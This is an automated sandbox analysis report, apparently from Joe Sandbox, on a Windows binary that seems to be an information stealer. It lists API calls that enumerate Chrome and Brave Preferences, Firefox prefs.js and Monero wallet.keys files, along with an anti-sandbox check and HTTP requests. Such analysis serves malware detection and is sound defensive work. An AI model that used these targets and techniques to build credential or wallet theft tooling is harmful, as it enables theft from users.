                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 3e60d610b90ead0a46bcc4361356f21396023582c2b8eb1d1c481480755e0e2b
                            • Instruction ID: 2a38c351d927fa502d8c067bcabfcc3b06d766998249d6f1a7d444074d861b66
                            • Opcode Fuzzy Hash: 3e60d610b90ead0a46bcc4361356f21396023582c2b8eb1d1c481480755e0e2b
                            • Instruction Fuzzy Hash: AB11FB30910449A7CB14FB74ED5AAED7B38BFD0300F408568B81E5A592EF346B06DB96
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0978c28c4da70863e7b52e72ced1ce945ff315cd1d7baeef107e5a1fd2d4d1ab
                            • Instruction ID: 1dfc6b91286604889f3d4fa3017de27be272b80db873f8b43deff500e3521dd7
                            • Opcode Fuzzy Hash: 0978c28c4da70863e7b52e72ced1ce945ff315cd1d7baeef107e5a1fd2d4d1ab
                            • Instruction Fuzzy Hash: B70186B1904209EBCB00DF94ED45BAABFB8FB45B21F108219FA45E3280C3785904CBA6
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0056112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00561132
                            • ExitProcess.KERNEL32 ref: 00561143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 59d74488561ec9c3967a03b5e6b5829d3621d291095133ac3cf468a0f871797b
                            • Instruction ID: 0109431862f32df5c965f0e1ecd3d1541527f32c948fd835c88f5b1eb40ea580
                            • Opcode Fuzzy Hash: 59d74488561ec9c3967a03b5e6b5829d3621d291095133ac3cf468a0f871797b
                            • Instruction Fuzzy Hash: 98E0E670945308FFE7516BA09D0EB1D7A78AB45B11F104154F709B71D0D7B92A40D79D
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005610B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005610F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: e4f8724f4a8ab5864eedea98dcac253ad1ad4bc500807b9ac0cbb2c055688032
                            • Instruction ID: cf88b2089556dbe46acdea73f092c029ee6cc41e4da00487866d2fc5b89cf761
                            • Opcode Fuzzy Hash: e4f8724f4a8ab5864eedea98dcac253ad1ad4bc500807b9ac0cbb2c055688032
                            • Instruction Fuzzy Hash: FDF0E971641204BBEB1497A4AC4DFBBB7D8E705715F304444F504E3280D6715F00DB55
                            APIs
                              • Part of subcall function 005778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                              • Part of subcall function 005778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                              • Part of subcall function 005778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                              • Part of subcall function 00577850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                              • Part of subcall function 00577850: RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                              • Part of subcall function 00577850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                            • ExitProcess.KERNEL32 ref: 005611C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 48af7db1c5c820ed72ffa296dddd3a98a7bf9ba4501a09d200e066a65f65693c
                            • Instruction ID: edc67b157cbf3907724c70d7b0cbd67c349ca2fc7abad3d9982148c1445e59be
                            • Opcode Fuzzy Hash: 48af7db1c5c820ed72ffa296dddd3a98a7bf9ba4501a09d200e066a65f65693c
                            • Instruction Fuzzy Hash: 96E0ECA595420663CA0077B1BC0EB3A3A9C7B96345F088424BA0993502FA29E810D66E
                            APIs
                            • wsprintfA.USER32 ref: 005738CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 005738E3
                            • lstrcat.KERNEL32(?,?), ref: 00573935
                            • StrCmpCA.SHLWAPI(?,00580F70), ref: 00573947
                            • StrCmpCA.SHLWAPI(?,00580F74), ref: 0057395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00573C67
                            • FindClose.KERNEL32(000000FF), ref: 00573C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 78de67186c8684c7af00d25403c10c71fbc315da214ebb2ff3661da3c78d465d
                            • Instruction ID: 2f47cc2254c6215c67bfbde24c1f2841ffc77c2b4c7173d2a16d9545ed7dd4b6
                            • Opcode Fuzzy Hash: 78de67186c8684c7af00d25403c10c71fbc315da214ebb2ff3661da3c78d465d
                            • Instruction Fuzzy Hash: 8DA153B2900219ABDB64DF64DC89FFE7778BF89300F048588B60D96141EB749B84DF62
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00580B32,00580B2B,00000000,?,?,?,005813F4,00580B2A), ref: 0056BEF5
                            • StrCmpCA.SHLWAPI(?,005813F8), ref: 0056BF4D
                            • StrCmpCA.SHLWAPI(?,005813FC), ref: 0056BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0056C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: cbdbd8c55c8c4544c1744286e0ad947af745e19cf2962888a06c897f2a84a33f
                            • Instruction ID: bde864809fb1d29fa03d1bb2bd290f1974ff6838c8d4b1a6293fd78776b11f4c
                            • Opcode Fuzzy Hash: cbdbd8c55c8c4544c1744286e0ad947af745e19cf2962888a06c897f2a84a33f
                            • Instruction Fuzzy Hash: 8F424472900105A7CB14FB74EC5AEEE7B7CBBD4300F408558B90AA7191EF34AB49DB96
                            APIs
                            • wsprintfA.USER32 ref: 0057492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            • StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                            • StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                            • FindClose.KERNEL32(000000FF), ref: 00574B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 1f8f78f73df8984fd677c121f489525a1b6d14b7a854d63bba3a63949c2e86c3
                            • Instruction ID: 1c9851524d3a46a07e54c9cf09b10a4e042e50cb6df4b42e34462f20129292e3
                            • Opcode Fuzzy Hash: 1f8f78f73df8984fd677c121f489525a1b6d14b7a854d63bba3a63949c2e86c3
                            • Instruction Fuzzy Hash: AD617972500219ABCB64EBA0EC49EFE777CBB89701F04C588B60D96040EB74EB85CF95
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00574580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00574587
                            • wsprintfA.USER32 ref: 005745A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 005745BD
                            • StrCmpCA.SHLWAPI(?,00580FC4), ref: 005745EB
                            • StrCmpCA.SHLWAPI(?,00580FC8), ref: 00574601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0057468B
                            • FindClose.KERNEL32(000000FF), ref: 005746A0
                            • lstrcat.KERNEL32(?,00E4EA98), ref: 005746C5
                            • lstrcat.KERNEL32(?,00E4D8A0), ref: 005746D8
                            • lstrlen.KERNEL32(?), ref: 005746E5
                            • lstrlen.KERNEL32(?), ref: 005746F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 08b178b30e9d82345e4234fb03940021ba6303ebd33402834ac456b045359ca8
                            • Instruction ID: 1a022198979c7d3016c220072df92997f024df76443faa355d08c40916bf66aa
                            • Opcode Fuzzy Hash: 08b178b30e9d82345e4234fb03940021ba6303ebd33402834ac456b045359ca8
                            • Instruction Fuzzy Hash: DA5155B1540219ABC765EB70DC89FEE777CBB98300F408588B61D92090EB789B84CF95
                            APIs
                            • wsprintfA.USER32 ref: 00573EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00573EDA
                            • StrCmpCA.SHLWAPI(?,00580FAC), ref: 00573F08
                            • StrCmpCA.SHLWAPI(?,00580FB0), ref: 00573F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0057406C
                            • FindClose.KERNEL32(000000FF), ref: 00574081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: e6f687f7b3333a2dbd2cae369ffd47693f6342a55eda0976b19eb5d18a56d660
                            • Instruction ID: 1805a6d500a18c022fd8aae72a52fc8f6bc37e79f11754f618d0dad34bb3ab51
                            • Opcode Fuzzy Hash: e6f687f7b3333a2dbd2cae369ffd47693f6342a55eda0976b19eb5d18a56d660
                            • Instruction Fuzzy Hash: 7C5146B2900219ABCB65EBB0DC49EFA777CBBC4300F40C588B65D96040DB799B89DF55
                            APIs
                            • wsprintfA.USER32 ref: 0056ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0056ED55
                            • StrCmpCA.SHLWAPI(?,00581538), ref: 0056EDAB
                            • StrCmpCA.SHLWAPI(?,0058153C), ref: 0056EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0056F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: ca8c83018b246a9fddd96cfa2966d081ebeb9f9750c357103da70bb464eaf1ac
                            • Instruction ID: fb83a28f542b2ef42436f223a0a19a87f2eca66b2e89dcbf099e8becbb20b13c
                            • Opcode Fuzzy Hash: ca8c83018b246a9fddd96cfa2966d081ebeb9f9750c357103da70bb464eaf1ac
                            • Instruction Fuzzy Hash: 16E1F0729111199ADB54FB60EC56EEE7B38BFD4300F408199B51E62092EF306F8ADF52
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005815B8,00580D96), ref: 0056F71E
                            • StrCmpCA.SHLWAPI(?,005815BC), ref: 0056F76F
                            • StrCmpCA.SHLWAPI(?,005815C0), ref: 0056F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0056FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 54a80a959ee25509197b12f9fd1f530068a1cc136667e57efcfc4b27317a12bd
                            • Instruction ID: 8cd8552d1d6a2ebf3a78e09f1fd8c52bf521a9f11ba78a4dee152fb2127013a1
                            • Opcode Fuzzy Hash: 54a80a959ee25509197b12f9fd1f530068a1cc136667e57efcfc4b27317a12bd
                            • Instruction Fuzzy Hash: E0B140719001159BCB24FB64EC5AAEE7B79BFD4300F40C5A8A40E97185EF306B49DF92
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0058510C,?,?,?,005851B4,?,?,00000000,?,00000000), ref: 00561923
                            • StrCmpCA.SHLWAPI(?,0058525C), ref: 00561973
                            • StrCmpCA.SHLWAPI(?,00585304), ref: 00561989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00561D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00561DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00561E20
                            • FindClose.KERNEL32(000000FF), ref: 00561E32
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 5a8616ac9db1565244a9b695e748cd6aa4bff392b959c07b4a742c53fed040a7
                            • Instruction ID: 56b966113663f57eb00ce36391560e46e15046d6de0c48bf6ae3e4586ae6e596
                            • Opcode Fuzzy Hash: 5a8616ac9db1565244a9b695e748cd6aa4bff392b959c07b4a742c53fed040a7
                            • Instruction Fuzzy Hash: B11210719101199ACB15FB60EC9AEEE7B78BFD4300F408199B51E62091EF306F89DF92
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
